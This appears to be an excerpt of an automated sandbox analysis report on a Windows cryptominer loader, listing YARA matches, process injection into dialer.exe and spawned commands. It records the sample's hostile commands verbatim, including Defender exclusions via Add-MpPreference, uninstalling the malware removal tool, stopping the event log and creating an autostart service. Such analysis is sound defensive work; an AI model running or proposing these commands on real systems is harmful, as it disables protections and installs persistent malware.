        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Uses powercfg.exe to modify the power settings
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,11_2_00000001400010C0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,20_2_00000225DC6428C8
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,26_2_00000202C0AE202C
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,26_2_00000202C0AE253C
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDF28C8 NtEnumerateValueKey,NtEnumerateValueKey,30_2_000002BAAEDF28C8
        Source: C:\Windows\System32\dialer.exeCode function: 39_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,39_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exeCode function: 42_2_0000000140001394 NtCloseObjectAuditAlarm,42_2_0000000140001394
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeFile created: C:\Windows\TEMP\gyqerfjfsbie.sysJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_psqhir2y.fz0.ps1
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_000000014000226C11_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00000001400014D811_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_000000014000256011_2_0000000140002560
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC611F2C20_2_00000225DC611F2C
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC61D0E020_2_00000225DC61D0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6238A820_2_00000225DC6238A8
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC642B2C20_2_00000225DC642B2C
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC64DCE020_2_00000225DC64DCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6544A820_2_00000225DC6544A8
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC671F2C20_2_00000225DC671F2C
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC67D0E020_2_00000225DC67D0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6838A820_2_00000225DC6838A8
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6A2B2C20_2_00000225DC6A2B2C
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6ADCE020_2_00000225DC6ADCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6B44A820_2_00000225DC6B44A8
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AB1F2C26_2_00000202C0AB1F2C
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AC38A826_2_00000202C0AC38A8
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0ABD0E026_2_00000202C0ABD0E0
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE2B2C26_2_00000202C0AE2B2C
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AF44A826_2_00000202C0AF44A8
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE026_2_00000202C0AEDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612D1F2C29_2_000002A6612D1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612DD0E029_2_000002A6612DD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612E38A829_2_000002A6612E38A8
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A661302B2C29_2_000002A661302B2C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66131AEC529_2_000002A66131AEC5
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE029_2_000002A66130DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6613144A829_2_000002A6613144A8
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDC1F2C30_2_000002BAAEDC1F2C
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDCD0E030_2_000002BAAEDCD0E0
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDD38A830_2_000002BAAEDD38A8
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDF2B2C30_2_000002BAAEDF2B2C
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDFDCE030_2_000002BAAEDFDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEE044A830_2_000002BAAEE044A8
        Source: C:\Windows\System32\dialer.exeCode function: 39_2_000000014000226C39_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 39_2_00000001400014D839_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 39_2_000000014000256039_2_0000000140002560
        Source: C:\Windows\System32\dialer.exeCode function: 42_2_000000014000324042_2_0000000140003240
        Source: C:\Windows\System32\dialer.exeCode function: 42_2_00000001400027D042_2_00000001400027D0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A8799D0E045_2_0000026A8799D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879A38A845_2_0000026A879A38A8
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A87991F2C45_2_0000026A87991F2C
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879CDCE045_2_0000026A879CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879D44A845_2_0000026A879D44A8
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879C2B2C45_2_0000026A879C2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537838A846_2_00000179537838A8
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000001795377D0E046_2_000001795377D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000017953771F2C46_2_0000017953771F2C
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537B44A846_2_00000179537B44A8
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537ADCE046_2_00000179537ADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537A2B2C46_2_00000179537A2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D53D0E047_2_000002295D53D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D5438A847_2_000002295D5438A8
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D531F2C47_2_000002295D531F2C
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D56DCE047_2_000002295D56DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D5744A847_2_000002295D5744A8
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D562B2C47_2_000002295D562B2C
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000253067D1F2C50_2_00000253067D1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000253067DD0E050_2_00000253067DD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000253067E38A850_2_00000253067E38A8
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E62B2C50_2_0000025306E62B2C
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E6DCE050_2_0000025306E6DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E744A850_2_0000025306E744A8
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3D44A851_2_000001845B3D44A8
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3CDCE051_2_000001845B3CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3C2B2C51_2_000001845B3C2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD4DCE053_2_000001ADECD4DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD544A853_2_000001ADECD544A8
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD42B2C53_2_000001ADECD42B2C
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D5590538A854_2_000001D5590538A8
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55904D0E054_2_000001D55904D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D559041F2C54_2_000001D559041F2C
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D5590844A854_2_000001D5590844A8
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55907DCE054_2_000001D55907DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D559072B2C54_2_000001D559072B2C
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EA2B2C55_2_00000241A9EA2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EADCE055_2_00000241A9EADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EB44A855_2_00000241A9EB44A8
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD73161F2C56_2_000001CD73161F2C
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD731738A856_2_000001CD731738A8
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7316D0E056_2_000001CD7316D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD73192B2C56_2_000001CD73192B2C
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD731A44A856_2_000001CD731A44A8
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7319DCE056_2_000001CD7319DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E86D0E057_2_000002824E86D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E8738A857_2_000002824E8738A8
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E861F2C57_2_000002824E861F2C
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E89DCE057_2_000002824E89DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E8A44A857_2_000002824E8A44A8
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E892B2C57_2_000002824E892B2C
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B473CD0E058_2_0000021B473CD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B473D38A858_2_0000021B473D38A8
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B473C1F2C58_2_0000021B473C1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B3DCE058_2_0000021B47B3DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B444A858_2_0000021B47B444A8
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B32B2C58_2_0000021B47B32B2C
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\gyqerfjfsbie.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: loader.exeStatic PE information: invalid certificate
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@62/74@2/2
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,11_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 39_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,39_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,11_2_00000001400019C4
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,11_2_000000014000226C
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7380:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7572:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7656:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7628:120:WilError_03
        Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\nrfynzqfftbrthxk
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7588:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4igs0l0.4bk.ps1Jump to behavior
        Source: loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: loader.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\Desktop\loader.exeFile read: C:\Users\user\Desktop\loader.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUTGFFPE"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUTGFFPE"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
